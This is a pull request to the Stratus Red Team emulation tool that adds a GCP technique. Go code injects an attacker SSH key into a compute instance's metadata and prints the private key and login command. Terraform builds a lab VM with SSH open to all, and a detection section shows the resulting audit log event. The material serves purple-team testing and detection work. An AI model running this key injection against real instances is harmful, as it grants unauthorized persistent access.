### PR TITLE
New technique: Register SSH public key to instance metadata

### DIFF
--- a/docs/attack-techniques/GCP/gcp.lateral-movement.add-sshkey-instance-metadata.md
+++ b/docs/attack-techniques/GCP/gcp.lateral-movement.add-sshkey-instance-metadata.md
@@ -1,0 +1,78 @@
+---
+title: Register SSH Public Key to Instance Metadata
+---
+
+# Register SSH Public Key to Instance Metadata
+
+<span class="smallcaps w3-badge w3-orange w3-round w3-text-sand" title="This attack technique might be slow to warm up or detonate">slow</span> 
+
+<span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: GCP
+
+## MITRE ATT&CK Tactics
+
+
+- Lateral Movement
+- Persistence
+
+## Description
+
+Register a public key to the instance's metadata to allow login and gain accessto the instance.
+
+<span style="font-variant: small-caps;">Warm-up</span>:
+
+- Create a compute instance (Linux)
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Create RSA key-pair (private key and public key)
+- Register public key to instance's metadata.
+- Print private key to stdout. 
+
+Note that you need to save the private key for login.
+
+Reference:
+- https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata
+- https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html
+
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate gcp.lateral-movement.add-sshkey-instance-metadata
+```
+
+## Detection
+
+
+Registering SSH public key to the instance's metadata is detected as 'compute.instances.setMetadata' in Cloud Logging
+
+Sample event (shortened for readability):
+
+```json
+{
+  "logName": "projects/my-project-id/logs/cloudaudit.googleapis.com%2Factivity",
+  "protoPayload": {
+    "authenticationInfo": {
+      "principalEmail": "username@service.com",
+    },
+    "metadata": {
+      "instanceMetadataDelta": {
+        "addedMetadataKeys": [
+          "ssh-keys public-key-here",
+        ],
+      },
+    },
+	"serviceName": "compute.googleapis.com",
+    "methodName": "v1.compute.instances.setMetadata",
+    "resourceName": "projects/my-project-id/zones/my-zone-id/instances/my-instance-id",
+  },
+  "resource": {
+    "type": "gce_instance"
+  },
+  "severity": "NOTICE"
+}
+```
+

--- a/docs/attack-techniques/GCP/index.md
+++ b/docs/attack-techniques/GCP/index.md
@@ -18,6 +18,11 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 - [Exfiltrate Compute Disk by sharing a snapshot](./gcp.exfiltration.share-compute-snapshot.md)
 
 
+## Lateral Movement
+
+- [Register SSH public key to instance](./gcp.lateral-movement.add-sshkey-instance-metadata.md)
+
+
 ## Persistence
 
 - [Backdoor a GCP Service Account through its IAM Policy](./gcp.persistence.backdoor-service-account-policy.md)

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -67,6 +67,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Exfiltrate Compute Disk by sharing it](./GCP/gcp.exfiltration.share-compute-disk.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Exfiltrate Compute Image by sharing it](./GCP/gcp.exfiltration.share-compute-image.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Exfiltrate Compute Disk by sharing a snapshot](./GCP/gcp.exfiltration.share-compute-snapshot.md) | [GCP](./GCP/index.md) | Exfiltration |
+| [Register SSH public key to instance metadata](./GCP/gcp.lateral-movement.add-sshkey-instance-metadata.md) | [GCP](./GCP/index.md) | Lateral Movement, Persistence |
 | [Backdoor a GCP Service Account through its IAM Policy](./GCP/gcp.persistence.backdoor-service-account-policy.md) | [GCP](./GCP/index.md) | Persistence |
 | [Create an Admin GCP Service Account](./GCP/gcp.persistence.create-admin-service-account.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Create a GCP Service Account Key](./GCP/gcp.persistence.create-service-account-key.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |

--- a/docs/index.yaml
+++ b/docs/index.yaml
@@ -415,7 +415,24 @@ GCP:
             - Exfiltration
           platform: GCP
           isIdempotent: true
+    Lateral Movement:
+        - id: gcp.lateral-movement.add-sshkey-instance-metadata
+          name: Register SSH public key to instance
+          isSlow: true
+          mitreAttackTactics:
+            - Lateral Movement
+            - Persistence
+          platform: GCP
+          isIdempotent: true
     Persistence:
+        - id: gcp.lateral-movement.add-sshkey-instance-metadata
+          name: Register SSH public key to instance
+          isSlow: true
+          mitreAttackTactics:
+            - Lateral Movement
+            - Persistence
+          platform: GCP
+          isIdempotent: true
         - id: gcp.persistence.backdoor-service-account-policy
           name: Backdoor a GCP Service Account through its IAM Policy
           isSlow: false

--- a/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-instance-metadata/main.go
+++ b/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-instance-metadata/main.go
@@ -1,0 +1,129 @@
+package gcp
+
+import (
+    "context"
+    _ "embed"
+    "fmt"
+    "log"
+    "google.golang.org/api/compute/v1"
+    gcp_utils "github.com/datadog/stratus-red-team/v2/internal/utils/gcp"
+    "github.com/datadog/stratus-red-team/v2/pkg/stratus"
+    "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+)
+
+//go:embed main.tf
+var tf []byte
+
+const AttackerUsername = "stratus-skim"
+
+func init() {
+    const CodeBlock = "```"
+    const AttackTechniqueId = "gcp.lateral-movement.add-sshkey-instance-metadata"
+
+    stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+        ID:           AttackTechniqueId,
+        FriendlyName: "Register SSH public key to instance metadata",
+        Description: `
+Register a public key to the instance's metadata to allow login and gain access to the instance.
+
+Warm-up: 
+
+- Create a compute instance (Linux)
+
+Detonation:
+
+- Create RSA key-pair (private key and public key)
+- Register public key to instance's metadata.
+- Print private key to stdout. 
+
+Note that you need to save the private key for login.
+
+Reference:
+- https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata
+- https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html
+`,
+        Detection: `
+Registering SSH public key to the instance's metadata is detected as 'compute.instances.setMetadata' in Cloud Logging
+
+Sample event (shortened for readability):
+
+` + CodeBlock + `json
+{
+  "logName": "projects/my-project-id/logs/cloudaudit.googleapis.com%2Factivity",
+  "protoPayload": {
+    "authenticationInfo": {
+      "principalEmail": "username@service.com",
+    },
+    "metadata": {
+      "instanceMetadataDelta": {
+        "addedMetadataKeys": [
+          "ssh-keys public-key-here",
+        ],
+      },
+    },
+    "serviceName": "compute.googleapis.com",
+    "methodName": "v1.compute.instances.setMetadata",
+    "resourceName": "projects/my-project-id/zones/my-zone-id/instances/my-instance-id",
+  },
+  "resource": {
+    "type": "gce_instance"
+  },
+  "severity": "NOTICE"
+}
+` + CodeBlock + `
+`,
+        Platform:                   stratus.GCP,
+        IsIdempotent:               true,
+        MitreAttackTactics:         []mitreattack.Tactic{ 
+            mitreattack.LateralMovement, 
+            mitreattack.Persistence },
+        PrerequisitesTerraformCode: tf,
+        Detonate:                   detonate,
+    })
+}
+
+func detonate(params map[string]string, providers stratus.CloudProviders) error {
+    gcp := providers.GCP()
+    ctx := context.Background()
+
+    projectId    := gcp.GetProjectId()
+    zone         := params["zone"]
+    instanceName := params["instance_name"]
+    instanceIp   := params["instance_ip"]
+
+    // create compute service
+    service, err := compute.NewService(ctx)
+    if err != nil {
+        return fmt.Errorf("Failed to create compute service: %v", err)
+    }
+
+    log.Println("Generating public/private key pair for user")
+
+    // create RSA public/key pair
+    key, err := gcp_utils.CreateSSHKeyPair()
+    if err != nil {
+        return fmt.Errorf("Failed to create RSA key-pair: %v", err)
+    }
+
+    log.Println("Registering public key to instance's metadata")
+    
+    // get instance information
+    instance, err := service.Instances.Get(projectId, zone, instanceName).Do()
+    if err != nil {
+        return fmt.Errorf("Failed to get instance information: %v", err)
+    }
+
+    md := instance.Metadata
+    entry := fmt.Sprintf("%s:%s", AttackerUsername, string(key.PublicKey))
+
+    gcp_utils.InsertToMetadata(md, "ssh-keys", entry)
+    if _, err := service.Instances.SetMetadata(projectId, zone, instanceName, md).Do(); err != nil {
+        return fmt.Errorf("Failed to update instance metadata: %v", err)
+    }
+
+    log.Printf("Save this Private Key as 'account.priv':\n\n%s\n", key.PrivateKey)
+    log.Println("Attacker can now login to the instance using the following command:")
+    log.Printf("ssh -i account.priv %s@%s", AttackerUsername, instanceIp)
+
+    return nil
+}

--- a/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-instance-metadata/main.tf
+++ b/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-instance-metadata/main.tf
@@ -1,0 +1,95 @@
+terraform {
+  required_providers {
+    google = {
+      source  = "hashicorp/google"
+      version = "~> 6.18.1"
+    }
+  }
+}
+
+provider "google" {
+  default_labels = {
+    stratus-red-team = "true"
+  }
+}
+
+locals {
+  resource_prefix = "stratus-red-team-skim"
+  region          = "us-east1"
+  instance_type   = "f1-micro"
+  image           = "debian-cloud/debian-11"
+}
+
+resource "random_string" "suffix" {
+  special = false
+  length  = 16
+  min_lower = 16
+}
+
+data "google_compute_zones" "available" {
+  region = local.region
+}
+
+resource "google_compute_network" "network" {
+  name  = "${local.resource_prefix}-vpc-${random_string.suffix.result}"
+  routing_mode = "REGIONAL"
+  auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "subnet" {
+  name          = "${local.resource_prefix}-subnet-${random_string.suffix.result}"
+  ip_cidr_range = "10.10.1.0/24"
+  network       = google_compute_network.network.id
+  region        = local.region
+}
+
+resource "google_compute_firewall" "firewall" {
+  name = "${local.resource_prefix}-firewall-${random_string.suffix.result}"
+  network = google_compute_network.network.id
+  allow {
+    protocol = "tcp"
+    ports    = ["22"]
+  }
+  source_ranges = ["0.0.0.0/0"]
+  target_tags   = ["ssh-access"]
+}
+
+resource "google_compute_instance" "target" {
+  name         = "${local.resource_prefix}-vm-${random_string.suffix.result}"
+  machine_type = local.instance_type
+  zone         = data.google_compute_zones.available.names[0]
+  hostname     = "target-${random_string.suffix.result}.stratus.local"
+  tags         = ["ssh-access"]
+
+  boot_disk {
+    initialize_params {
+      image = local.image
+    }
+  }
+
+  network_interface {
+    network = google_compute_network.network.id
+    subnetwork = google_compute_subnetwork.subnet.id
+
+    access_config { }
+  }
+}
+
+output "display" {
+  value = format("Linux instance (hostname: %s, ip: %s) is ready", 
+    google_compute_instance.target.name,
+    google_compute_instance.target.network_interface.0.access_config.0.nat_ip
+  )  
+}
+
+output "zone" {
+  value = data.google_compute_zones.available.names[0]
+}
+
+output "instance_name" {
+  value = google_compute_instance.target.name
+}
+
+output "instance_ip" {
+  value = google_compute_instance.target.network_interface.0.access_config.0.nat_ip
+}

--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
@@ -58,6 +58,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-disk"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-image"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-instance-metadata"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/backdoor-service-account-policy"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-service-account-key"

--- a/v2/internal/utils/gcp/gcp_utils.go
+++ b/v2/internal/utils/gcp/gcp_utils.go
@@ -4,6 +4,12 @@ import (
 	"context"
 	"errors"
 	"fmt"
+	"crypto/rand"
+	"crypto/rsa"
+	"crypto/x509"
+	"encoding/pem"
+	"golang.org/x/crypto/ssh"
+	"google.golang.org/api/compute/v1"
 	"github.com/datadog/stratus-red-team/v2/internal/providers"
 	utils "github.com/datadog/stratus-red-team/v2/internal/utils"
 	"google.golang.org/api/cloudresourcemanager/v1"
@@ -11,6 +17,11 @@ import (
 	"os"
 	"strings"
 )
+
+type SshKeyPair struct {
+    PrivateKey []byte
+    PublicKey  []byte
+}
 
 // GCPAssignProjectRole grants a project-wide role to a specific service account
 // it works the same as 'gcloud projects add-iam-policy-binding':
@@ -103,4 +114,67 @@ func GetAttackerPrincipal() string {
 	} else {
 		return UserPrefix + DefaultFictitiousAttackerEmail
 	}
+}
+
+// CreateRSAKeyPair generates a new RSA key pair
+// the private key is encoded in PEM format
+// the public key is encoded in OpenSSH format
+func CreateSSHKeyPair() (SshKeyPair, error) {
+    // generate key
+    key, err := rsa.GenerateKey(rand.Reader, 4096)
+    if err != nil {
+        return SshKeyPair{}, err
+    }
+
+    // validate private key
+    err = key.Validate()
+    if err != nil {
+        return SshKeyPair{}, err
+    }
+
+    // create public key
+    pubKey, err := ssh.NewPublicKey(&key.PublicKey)
+    if err != nil {
+        return SshKeyPair{}, err
+    }
+    pubKeyBytes := ssh.MarshalAuthorizedKey(pubKey)
+
+    // encode key
+    // get ASN.1 DER format
+    privKeyDer := x509.MarshalPKCS1PrivateKey(key)
+
+    // PEM block
+    privKeyBlock := pem.Block {
+        Type:       "RSA PRIVATE KEY",
+        Headers:    nil,
+        Bytes:      privKeyDer,
+    }
+    privKey := pem.EncodeToMemory(&privKeyBlock)
+
+    return SshKeyPair { privKey, pubKeyBytes }, nil
+}
+
+// InsertToMetadata insert item into metadata
+func InsertToMetadata(md *compute.Metadata, key string, value string) {
+    var found bool
+
+    // find the presence of key (ssh-keys, windows-keys) in metadata
+    for _, mdi := range md.Items {
+        // if it exists, add it to existing key
+        if mdi.Key == key {
+            val := fmt.Sprintf("%s%s", *mdi.Value, value)
+            mdi.Value = &val
+
+            found = true 
+            break
+        }
+    }
+
+    // if key (ssh-keys, windows-keys) is not exists, create it and add our key
+    if !found {
+        md.Items = append(md.Items, &compute.MetadataItems {
+            Key:   key,
+            Value: &value,
+        })
+    }
 }


### PR DESCRIPTION
### What does this PR do?

* add new technique: Register SSH public key to instance metadata

Lateral movement to any Cloud Compute instance by registering public key to instance metadata. This technique only affecting individual instance.

### Motivation

This technique is developed as part of Grab's purple teaming activity and we want to share it so more people can get the benefit.

-------

Co-authored-by: Satria Ady Pradana <xathrya@reversing.id>